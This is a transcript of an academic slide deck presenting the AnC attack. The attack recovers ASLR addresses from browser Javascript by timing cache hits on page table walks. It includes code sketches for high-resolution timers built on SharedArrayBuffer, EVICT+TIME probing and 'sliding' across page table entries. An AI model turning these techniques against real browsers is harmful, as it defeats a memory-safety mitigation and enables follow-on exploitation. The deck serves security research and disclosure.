ASLR on the Line - Ben Gras, Kaveh Razavi, Erik Bosman, Herbert Bos, Cristiano Giuffrida (VUSec)



SLIDE 1

ASLR on the Line

Ben Gras, Kaveh Razavi, Erik Bosman, Herbert Bos, Cristiano Giuffrida

VUSec

SLIDE 2

Erik Bosman

@brainsmoke

SLIDE 3

Ben Gras

@bjg

Kaveh Razavi

@gober

Stephan van Schaik

SLIDE 4
SLIDE 5

ASLR

SLIDE 6

Address Space Layout Randomization

Widely deployed exploit mitigation strategy: choose a different location for code and data every time a process is run.

SLIDES 7-13 (animation)

[Diagram: the address space from lower addresses to higher addresses (up to 2^48-1)]

SLIDE 14

Address Space Layout Randomization

Makes life for exploit writers a bit more difficult. Usually exploits need to know the location of certain data in memory.
SLIDE 15

A Single Leak Reveals

- Joshua Drake
SLIDE 16

Address Space Layout Randomization

Exploit writers need to find a bug which leaks addresses without crashing the program. ... or do they?

SLIDE 17

This Presentation:

A side-channel attack on a process baked into the hardware, to discover ASLR information from Javascript in the browser: ASLR⊕Cache (AnC)

SLIDE 18

Modern CPU architectures

[Diagram: multiple CPU cores, each with private L1 and L2 caches, sharing an L3 (Last Level Cache) and DDR memory]

SLIDES 19-25 (animation)

[Diagram: a memory access issues a virtual address; the MMU translates it to a physical address via the TLB cache, falling back to a page table (PT) walk on a miss; data is served through the per-core L1 code / L1 data and L2 caches and the L3 (Last Level Cache), shared between cores]

SLIDE 26

Timers in Javascript

SLIDES 27-29 (animation)

t0 = performance.now();
operation();
t1 = performance.now();
t = t1 - t0;

[Graph: measured time vs. real time, before and after anti side-channel mitigations (Firefox)]

SLIDES 30-35 (animation)

c = 0;
t0 = p.now();
while (t0 == p.now());
t1 = p.now();
operation();
while (t1 == p.now()) { c++; }

[Graph: measured time vs. real time, after anti side-channel mitigations (Firefox and Chrome)]
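
The loop above can be wrapped into a small helper. A minimal sketch of the clock-edge counting idea, assuming a coarse performance.now() and a caller-supplied operation() to measure (names are illustrative, not from the slides):

    // Wait for performance.now() to tick over, run the operation,
    // then count how many loop iterations fit before the next tick.
    // A longer operation leaves less time, so the count c is smaller.
    function edgeCount(operation) {
      const p = performance;
      let c = 0;
      let t0 = p.now();
      while (t0 == p.now());          // spin until a clock edge
      const t1 = p.now();             // we are now right after the edge
      operation();                    // e.g. the memory access to time
      while (t1 == p.now()) { c++; }  // count until the next edge
      return c;                       // smaller c means a slower operation
    }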

SLIDE 36

new SharedArrayBuffer()

SLIDE 37

memory which may be shared between multiple worker threads.

new SharedArrayBuffer()

SLIDE 38

enabled by default by Firefox, Chrome and Edge since 2017

memory which may be shared between multiple worker threads.

new SharedArrayBuffer()

SLIDE 39

let SharedRowhammerBuffer = SharedArrayBuffer;

SLIDES 40-46 (animation)

Thread 1:
buf[0] = 1;
operation();
buf[0] = 0;

Thread 2:
c = 0;
while (buf[0] == 0);
while (buf[0] == 1) { c++; }

[Graph: measured time vs. real time, using SharedArrayBuffer and worker threads]
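
A dedicated worker can also act as the clock itself: it increments a shared counter in a tight loop, and the main thread reads the counter around the operation. A minimal sketch of this counting-thread timer, assuming a hypothetical worker.js file and using Atomics so the loads are not optimized away (the names are illustrative, not the slides' exact code):

    // main thread
    const sab = new SharedArrayBuffer(4);
    const counter = new Uint32Array(sab);
    const worker = new Worker('worker.js');
    worker.postMessage(sab);

    function ticks(operation) {
      const start = Atomics.load(counter, 0);
      operation();                              // the memory access to time
      return Atomics.load(counter, 0) - start;  // elapsed "ticks"
    }

    // worker.js: spin, incrementing the shared counter as fast as possible
    onmessage = (e) => {
      const c = new Uint32Array(e.data);
      for (;;) Atomics.add(c, 0, 1);
    };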

SLIDE 47

Cache Side-Channels

SLIDE 48

[Diagram: memory accessed by physical address, divided into 64-byte cache lines]

SLIDES 49-54 (animation)

[Diagram: the L3 cache is N-way associative, with 2048 cache sets of 64-byte cache lines and as many slices as cores]

cache_set = (addr >> 6) % 2048 (direct mapping, repeated every 128KB)
cache_slice = xor_hash(addr)

SLIDES 55-58 (animation)

cache_set = (addr >> 6) % 2048, direct mapping, repeated every 128KB

Two cache lines mapping to the same cache set have the same physical address modulo 128KB, and hence modulo 4KB: the same offset into their memory page (1 page = 64 cache lines).
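
To make the mapping concrete, a tiny sketch of the set-index computation (the addresses are arbitrary examples, not from the slides):

    // Set index for an address in a 2048-set, 64-byte-line L3 cache.
    const cacheSet = (addr) => (addr >>> 6) % 2048;
    cacheSet(0x12340);               // some set s
    cacheSet(0x12340 + 128 * 1024);  // the same set s: the mapping repeats every 128KB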

SLIDES 59-65 (animation)

EVICT + TIME: does an operation use a specific cache line?

evict(line_x);
t0 = time();
operation();
t = time() - t0;

[Diagram: accessing cache lines of a buffer (mybuf) that map to the same cache set evicts line_x from the L3 cache; the timed operation then triggers the memory access (or not)]
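
In Javascript the evict step is done by touching enough cache lines that map to the same cache set. A rough sketch of EVICT + TIME under that assumption, reusing the ticks() helper sketched earlier; mem and evictionSet are illustrative and would have to be built from a large buffer:

    // evictionSet: byte offsets into `mem` (a large Uint8Array) that all map
    // to the same L3 cache set as the line we want to evict (assumed given).
    function evictAndTime(mem, evictionSet, operation) {
      // EVICT: walk addresses in the same cache set, pushing the target line out of L3.
      for (const off of evictionSet) mem[off] += 1;
      // TIME: if operation() touches the evicted line it must go to memory,
      // so it takes measurably longer.
      return ticks(operation);
    }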

SLIDE 66

[Diagram (recap): a memory access issues a virtual address; the MMU consults the TLB cache, performs a PT walk on a miss, and the resulting physical address is served through the L1/L2/L3 caches]

SLIDE 67

Page Tables

SLIDE 68

[Diagram: the address space from lower addresses to higher addresses (up to 2^48-1)]

SLIDES 69-73 (animation)

[Diagram: starting from CR3, the top-level page table has 512 entries covering 512GB each; the next level has 512 entries covering 1GB each; the next 512 entries covering 2MB each; and the last level 512 entries pointing to 4096-byte regions in memory (a 48-bit address space, up to 2^48-1)]

SLIDE 74

virtual address lookup (x86_64)

7F83B6372040

SLIDE 75

[Diagram: the hex digits of 7F83B6372040 split into the page table index fields they encode]
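
The index values that appear in the following slides (255, 14, 433, 370 and offset 64) fall directly out of the address bits. A small sketch of the x86_64 split, using BigInt for the 48-bit address:

    const va = 0x7F83B6372040n;
    const offset = va & 0xFFFn;        //  64: byte offset within the 4K page
    const l1 = (va >> 12n) & 0x1FFn;   // 370: page table index
    const l2 = (va >> 21n) & 0x1FFn;   // 433: page directory index
    const l3 = (va >> 30n) & 0x1FFn;   //  14: page directory pointer index
    const l4 = (va >> 39n) & 0x1FFn;   // 255: top-level (PML4) index, reached via CR3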

SLIDES 76-90 (animation)

TLB miss!

[Diagram: on a TLB miss the MMU walks the page tables starting from CR3. Each level is a table of 512 entries; the walk uses entry 255 at the top level, then 14, then 433, then 370, and finally byte offset 64 into the 4K page holding the actual data]

SLIDE 91

Observation:

Address information is directly encoded into the page table lookups, and page tables are pages themselves.
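
Concretely, a page table is one 4KB page holding 512 eight-byte entries, so entry i sits in cache line floor(i*8/64) of that page. A small illustration (the helper name is made up):

    // Which 64-byte cache line of its page-table page does entry i live in?
    const ptCacheLine = (i) => (i * 8) >> 6;   // 0..63
    ptCacheLine(370);  // 46: seeing line 46 hot narrows the index to 368..375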

SLIDES 92-94 (animation)

[Diagram: the same page table walk (255, 14, 433, 370, offset 64), highlighting that each page table in the walk is itself a 4K page]

SLIDE 95

CR3

SLIDES 96-99 (animation)

[Diagram: page table entries 248-255 share one cache line; the observed entry (255) could be any of them]

1 cache line = 64 bytes = 8 possible page table entries, so the cache line reveals 6 of the 9 index bits

SLIDES 100-104 (animation)

[Diagram: the recovered address components 255, 14, 433, 370 and page offset 64]

location within the page known by studying the browser memory allocator

max entropy left:

SLIDES 105-109 (animation)

? ? ? ?

which hit belongs to which cache line?

max entropy left: 4*3 bits + log2(4 * 3 * 2 * 1) ≈ 16.6 bits
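
Unpacking the formula: each of the four page table levels still has 3 unrecovered bits (8 possible entries within the observed cache line), giving 4*3 = 12 bits, and not knowing which of the four hot cache lines belongs to which level adds log2(4!) = log2(24) ≈ 4.6 bits, for roughly 16.6 bits of remaining entropy.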

SLIDE 110

Sliding

Allocate a buffer, perform this side-channel attack on buffer entries 4096 bytes apart, and measure when the page table lookup crosses a cache line boundary.
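
A rough sketch of sliding over the level-1 page table, building on the EVICT + TIME idea above; probePage() is a hypothetical helper that returns which page-table cache line lights up for a given buffer offset, and page-table boundaries are ignored:

    // Probe pages 4096 bytes apart; the hot page-table cache line moves to the
    // next line exactly when the 9-bit index crosses a multiple of 8, which
    // pins down the 3 low bits that the cache line alone cannot reveal.
    function slideLevel1(buf, probePage) {
      let prev = probePage(buf, 0);
      for (let page = 1; page < 8; page++) {
        const line = probePage(buf, page * 4096);
        if (line !== prev) return 8 - page;  // low 3 bits of the original index
        prev = line;
      }
      return 0;  // no crossing within 7 steps: the index was already 8-aligned
    }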

SLIDES 111-117 (animation)

[Diagram: stepping the probed buffer address forward 4096 bytes at a time advances the level-1 page table index from 370 to 376, one entry per step, until the lookup crosses into the next cache line]

SLIDE 118

Sliding

We can do the same thing for the 2nd-level page table.

SLIDES 119-126 (animation)

[Diagram: stepping the probed address forward 2MB at a time advances the level-2 page table index from 433 to 440, one entry per step]

SLIDES 127-129 (animation)

? ?

max entropy left: 2*3 + log2(2 * 1) = 7 bits
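
That is: the two remaining unresolved levels contribute 2*3 = 6 unknown bits, and not knowing which of the two hot cache lines belongs to which level adds log2(2!) = 1 bit, for 7 bits in total.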

SLIDE 130

[Diagram: sliding in 1GB steps over the level-3 page table entries around index 14]

SLIDE 131

[Diagram: sliding in 512GB steps over the level-4 page table entries around index 255]

SLIDE 132

Allocating large chunks of memory

Firefox (on Linux) does not initialize ArrayBuffers, so Linux does not allocate space for the actual pages. We can allocate huge chunks and use sliding to recover the whole address.

SLIDE 133

Allocating large chunks of memory

Chrome does initialize memory, but jumps ahead in the address space every time it creates a new heap. The 3rd-level address bits can be recovered; recovering the 4th-level bits would need Chrome to initialize/free up to 4TB :-)

SLIDE 134

This side-channel was detected on 22 out of 22 tested architectures!

CPU Model / Microarchitecture / Year
Intel Xeon E3-1240 v5 / Skylake / 2015
Intel Core i7-6700K / Skylake / 2015
Intel Celeron N2840 / Silvermont / 2014
Intel Xeon E5-2658 v2 / Ivy Bridge EP / 2013
Intel Atom C2750 / Silvermont / 2013
Intel Core i7-4500U / Haswell / 2013
Intel Core i7-3632QM / Ivy Bridge / 2012
Intel Core i7-2620QM / Sandy Bridge / 2011
Intel Core i5 M480 / Westmere / 2010
Intel Core i7 920 / Nehalem / 2008
AMD FX-8350 8-Core / Piledriver / 2012
AMD FX-8320 8-Core / Piledriver / 2012
AMD FX-8120 8-Core / Bulldozer / 2011
AMD Athlon II 640 X4 / K10 / 2010
AMD E-350 / Bobcat / 2010
AMD Phenom 9550 4-Core / K10 / 2008
Allwinner A64 / ARM Cortex A53 / 2016
Samsung Exynos 5800 / ARM Cortex A15 / 2014
Samsung Exynos 5800 / ARM Cortex A7 / 2014
Nvidia Tegra K1 CD580M-A1 / ARM Cortex A15 / 2014
Nvidia Tegra K1 CD570M-A1 / ARM Cortex A15; LPAE / 2014

SLIDE 135

Demo video

SLIDE 136

Conclusions

  • Browser vendors seem to have given up on protecting against side-channel attacks in favor of adding features :,-(

  • It's possible to perform cache side-channel attacks from Javascript on the Memory Management Unit to recover ASLR information

SLIDE 137

Any Questions?

VUSec

project page: https://vusec.net/projects/anc